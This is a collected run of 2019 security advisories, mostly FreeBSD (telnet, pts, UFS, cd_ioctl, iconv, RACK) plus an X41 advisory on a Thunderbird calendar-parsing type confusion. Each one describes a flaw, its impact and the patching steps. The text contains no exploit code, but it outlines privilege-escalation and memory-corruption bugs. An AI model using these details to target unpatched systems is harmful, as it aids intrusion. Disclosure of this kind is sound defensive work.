# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc
# gpg --verify freebsd32.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/11/r350217
releng/11.2/  r350283
releng/11.3/  r350283
- -

Note: This issue was addressed in a different way prior to the branch point
for stable/12. As such, no patch is needed for FreeBSD 12.x.

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmNfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIavw//emdRXVNpGREW1FfUvWmUPpdgk6rFck9nEG0KUKYCcfhqN83BN9XtqaWu
lBQ1jbB/CsalwL6Gpn2yuMvgS8W4yUidyPHLpzuoAThlsy5bHID1/oRftJt0T0BS
kHbTD0tTUt3QDV51FoLBjvXfjRRb8xJ+wIGJ0NzOscWgjgu6JPUysHEJD3+vSOKN
X3qJd3zcoYqswcvuhoVE2cFrSaZKEyIi1pJVr9CGItQTWXIisgdXdGYTnBdZU8jq
iJGaI1BXiNUl/p/21JA32T+ZD7cdMtx6KiuoKlY7Bzgj7Qk3XW7xsQsYu724LIJT
pVhIxntMrQSak7wIaqNPGR/FgkkKDsoo6iCHXlGxXv6tLg7pnioZIaHhc5+UZqmT
8I0UogWhQZS03/nwFRVDLPp+ka2P0g2gsm/dX1UVuucMT+hGeqn2c/iaSU76duoR
qavRPjLPJDnfVrpXhpqco9rq1+UwA/1uSNe0cFX0ArX040hCReDsMphcxgrkZ0sD
u71Px2ZLE5rpWmFd8LD0X2y1l4OEcTmoTPUtJxHlVrMFztuNbAlRnyCxTV8c2uId
zN44wRj6c2ZEV/w+kBVTV+L7NSt1eHDZ5tgUL7b

FreeBSD Security Advisory FreeBSD-SA-19:12.telnet

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:12.telnet Security Advisory
  The FreeBSD Project

Topic:  telnet(1) client multiple vulnerabilities

Category:   contrib
Module: contrib/telnet
Announced:  2019-07-24
Credits:Juniper Networks
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-0053

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The telnet(1) command is a TELNET protocol client, used primarily to
establish terminal sessions across a network.

II.  Problem Description

Insufficient validation of environment variables in the telnet client
supplied in FreeBSD can lead to stack-based buffer overflows.  A stack-
based overflow is present in the handling of environment variables when
connecting via the telnet client to remote telnet servers.

This issue only affects the telnet client.  Inbound telnet sessions to
telnetd(8) are not affected by this issue.

III. Impact

These buffer overflows may be triggered when connecting to a malicious
server, or by an active attacker in the network path between the client
and server.  Specially crafted TELNET command sequences may cause the
execution of arbitrary code with the privileges of the user invoking
telnet(1).

IV.  Workaround

Do not use telnet(1) to connect to untrusted machines or over an
untrusted network.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch
# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc
# gpg --verify telnet.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350139
releng/12.0/  r350281
stable/11/r350140
releng/11.2/  r350281
releng/11.3/  r350281
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WltfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLOzA//YxRZNUr+d8B+t6DnBUbVvthJiY9sQ1YPXUIJmp4QA7wvXr5UjURw+6qv
raxEp6JmF06wZK4RjeIFckQD6s2wnjO5VHO80Zbs0nD4NejQGeDAIlVdKqofOtJv
bBQNSY3vPAtumyfElc+N19rKetAjGbsUjOMbn87GlWrit4lqcavBQsdmSlQB5gVA
dFAFsVxr+ujjATnrCmIpFiaDk0unyJ7Gtz7jiM9I8xZueJtM49/9kNCFFLKCMUl8
HpB2k0cb18GVNJoKtzo1nELOM/oIJVO5HZt1fmYG/RgeL1BSyzg4q/5

FreeBSD Security Advisory FreeBSD-SA-19:13.pts

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:13.ptsSecurity Advisory
  The FreeBSD Project

Topic:  pts(4) write-after-free

Category:   core
Module: kernel
Announced:  2019-07-24
Credits:syzkaller
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5606

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The posix_openpt(2) system call allocates a pseudo-terminal device and
returns a descriptor referencing that device.  Such a descriptor may be
configured such that a SIGIO signal will be sent to a designated process
or process group when the device is ready to perform I/O.

II.  Problem Description

The code which handles a close(2) of a descriptor created by
posix_openpt(2) fails to undo the configuration which causes SIGIO to be
raised.  This bug can lead to a write-after-free of kernel memory.

III. Impact

The bug permits malicious code to trigger a write-after-free, which may
be used to gain root privileges or escape a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch
# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc
# gpg --verify pts.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r349805
releng/12.0/  r350282
stable/11/r349806
releng/11.2/  r350282
releng/11.3/  r350282
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04Wl9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLZDA//SGC+7Vghtofm/CzylIXhC1drFOxNYJOF7KEJqDwsRR3U9S99Q9NBWS5+
e+/vJzvV0+epZNQXDlit5a76jGwy4fNuutNh0J3APHe/l0Zp/PhM56IwRWQgqAkQ
hF67xhHxFZs8AH6/bw21N4IkRrAZHmrrCY8ubZArjoUi0gCoFzAYRw1Nh/JTQoLS
IGuqUFaMZWKvu3aeJiikLjHiJUMRAY7sxh+iSBSp99dsLkASqQZtx1grmosljttN
fuD7qO2f067EWUpC50JTbNt9V7za854hrlOp8jn1g51O4fWWJoEEL2/0VUeOO+fr
aGS9UNal25NPr2zGzx2t0u1VNE3/YKoZ0tq+mQYtaXke32ZO15Ufby0YcLU4DF8d
dU1ZoG2AGbWmBqgQ982hocq5Dn0r5yCHXDeEGguE1DsfyBuUEZw6zfYRtzIQ0swk
wDrdETxpIMa8jaSGtDw2bilrLNRIVqYkXBJftC3fpXhlz6PyU6bZaFm00xrs7z1D
EJMkuIWho9oMqLTU7bZNHv7JD4G3ziTF1h2tGXGcEKp02ImNZQnw3w5PBberFgto
H4uJQCWgFqqddkjnSidX3Uj676LC99ERDEUl

FreeBSD Security Advisory FreeBSD-SA-19:10.ufs

2019-07-03 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:10.ufsSecurity Advisory
  The FreeBSD Project

Topic:  Kernel stack disclosure in UFS/FFS

Category:   core
Module: Kernel
Announced:  2019-07-02
Credits:David G. Lawrence 
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE)
2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7)
2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE)
2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:   CVE-2019-5601

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The Berkeley Fast File System (FFS) is an implementation of the UNIX File
System (UFS) filesystem used by FreeBSD.

II.  Problem Description

A bug causes up to three bytes of kernel stack memory to be written to disk
as uninitialized directory entry padding.  This data can be viewed by any
user with read access to the directory.  Additionally, a malicious user with
write access to a directory can cause up to 254 bytes of kernel stack memory
to be exposed.

III. Impact

Some amount of the kernel stack is disclosed and written out to the
filesystem.

IV.  Workaround

No workaround is available but systems not using UFS/FFS are not affected.

V.   Solution

Special note: This update also adds the -z flag to fsck_ffs to have it scrub
the leaked information in the name padding of existing directories.  It only
needs to be run once on each UFS/FFS filesystem after a patched kernel is
installed and running.

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc
# gpg --verify ufs.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc
# gpg --verify ufs.11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r347474
releng/12.0/  r349623
stable/11/r347475
releng/11.2/  r349623
- -

Note: This patch was applied to the stable/11 branch before the branch point
for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC.

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WVfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cJgRhAAic+yb4boY5k2TotBe9x

FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl

2019-07-03 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:11.cd_ioctl   Security Advisory
  The FreeBSD Project

Topic:  Privilege escalation in cd(4) driver

Category:   core
Module: kernel
Announced:  2019-07-02
Credits:Alex Fortune
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE)
2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7)
2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE)
2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1)
2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:   CVE-2019-5602

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The cd(4) driver implements a number of ioctls to permit low-level access to
the media in the CD-ROM device.  The Linux emulation layer provides a
corresponding set of ioctls, some of which are implemented as wrappers of
native cd(4) ioctls.

These ioctls are available to users in the operator group, which gets
read-only access to cd(4) devices by default.

II.  Problem Description

To implement one particular ioctl, the Linux emulation code used a special
interface present in the cd(4) driver which allows it to copy subchannel
information directly to a kernel address.  This interface was erroneously
made accessible to userland, allowing users with read access to a cd(4)
device to arbitrarily overwrite kernel memory when some media is present in
the device.

III. Impact

A user in the operator group can make use of this interface to gain root
privileges on a system with a cd(4) device when some media is present in the
device.

IV.  Workaround

devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from
cd(4) devices.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc
# gpg --verify cd_ioctl.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc
# gpg --verify cd_ioctl.11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r349628
releng/12.0/  r349625
stable/11/r349629
releng/11.3/  r349625
releng/11.2/  r349625
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WtfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1Qz

FreeBSD Security Advisory FreeBSD-SA-19:09.iconv

2019-07-03 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:09.iconv  Security Advisory
  The FreeBSD Project

Topic:  iconv buffer overflow

Category:   core
Module: libc
Announced:  2019-07-02
Credits:Andrea Venturoli , NetFence
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE)
2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7)
2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE)
2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1)
2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:   CVE-2019-5600

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The iconv(3) API converts text data from one character encoding to another
and is available as part of the standard C library (libc).

II.  Problem Description

With certain inputs, iconv may write beyond the end of the output buffer.

III. Impact

Depending on the way in which iconv is used, an attacker may be able to
create a denial of service, provoke incorrect program behavior, or induce a
remote code execution.  iconv is a libc library function and the nature of
possible attacks will depend on the way in which iconv is used by
applications or daemons.

IV.  Workaround

No workaround is available.  Stack canaries (-fstack-protector), which are
enabled by default, provide a degreee of defense against code injection but
not against denial of service.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.  Restart any
potentially affected daemons.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch
# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc
# gpg --verify iconv.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r349622
releng/12.0/  r349621
stable/11/r349624
releng/11.3/  r349621
releng/11.2/  r349621
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WBfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK8qg//bXSYMJQUBC0POTT5zGXSAmXfKjxbCi4N67cfTrQkEvW672QX4Jw9smkK
D3PwyQs8QWIwsXL69rRgKDFHhPplOmTkx1vaPrA3DckYliwNvLRV3I6G2bRnx3E3
DoAyDmBvFK5lJWa3WxbCpeJA69yZ/JbX1Yw6HsRLk74hGkfvlkruKkfxsNjXzaq4
0+d+ZYs/vRDmIW5/R/bYy1+iyDamyCMl2xXtlZBKrGe6lhj8Vi4/evJjipFtskc2
RnGKolNoZQc03pgX0QS2JZDb+ay23elkOCbhYPqGr1f++M95oOktX3epsJNSH++u
pmJ72FNRsnZSVFxoX7o14eh4k6OGYIvGFSkXQ9VG1NV7PQO8VZAQk9gw264O/1Mi
2aW88e78GLallQOg32VM+Ybys9MamBHByiYRz+GXhh91gg

FreeBSD Security Advisory FreeBSD-SA-19:08.rack

2019-06-24 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:08.rack Security Advisory
The FreeBSD Project

Topic: Resource exhaustion in non-default RACK TCP stack

Category: core
Module: inet
Announced: 2019-06-19
Credits:Jonathan Looney (Netflix)
Peter Lei (Netflix)
Affects:FreeBSD 12.0 and later
Corrected: 2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE)
2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6)
CVE Name: CVE-2019-5599

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I. Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides
a connection-oriented, reliable, sequence-preserving data stream service.

A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses the
notion of time, in addition to packet or sequence counts, to detect losses
for modern TCP implementations that support per-packet timestamps and the
selective acknowledgment (SACK) option.

FreeBSD ships an optional implementation of RACK. Please note this is not
included by default. If RACK was not specifically compiled, installed, and
loaded, the system is not vulnerable.

II. Problem Description

While processing acknowledgements, the RACK code uses several linked lists to
maintain state entries. A malicious attacker can cause the lists to grow
unbounded. This can cause an expensive list traversal on every packet being
processed, leading to resource exhaustion and a denial of service.

III. Impact

An attacker with the ability to send specially crafted TCP traffic to a
victim system can degrade network performance and/or consume excessive CPU by
exploiting the inefficiency of traversing the potentially very large RACK
linked lists with relatively small bandwidth cost.

IV. Workaround

By default RACK is not compiled or loaded into the TCP stack. To determine
if you are using RACK, check the net.inet.tcp.functions_available sysctl.
If it includes a line with "rack", the RACK stack is loaded.

To disable RACK, unload the kernel module with:

# kldunload tcp_rack

Note: it may be required to use the force flag (-f) with the kldunload.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Since the tcp_rack kernel module is not built by default, recompile,
reinstall, and reload the kernel module.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch
# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc
# gpg --verify rack.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile, reinstall, and reload the tcp_rack kernel module.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path Revision
- -
stable/12/r349197
releng/12.0/ r349199
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0KZy1fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbn

X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-004

Type confusion in Thunderbird
=
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird

Summary and Impact
==
A type confusion has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was
forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash the process or leak
information from the client system via calendar replies.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis

A type confusion in icalproperty.c
icaltimezone_get_vtimezone_properties() can be triggered while parsing a
malformed calendar attachment. Missing sanity checks allows a TZID
property to be parsed as ICALFLOATVALUE but it is later used as a
string.
The bug manifests with strdup(tzid); being called with tzid containing
a bad pointer obtained by casting to char* from a float value, which
typically means segfaulting by dereferencing a non-mapped memory page.
An attacker might be able to deliver an input file containing specially
crafted float values as TZID properties which could point to arbitrary
memory positions.
Certain conditions could allow to exfiltrate information via a calendar
reply or other undetermined impact.

Proof of Concept

A reproducer eml file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-004

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline

2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and a IT security consulting and support services are
core competencies of X41.
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
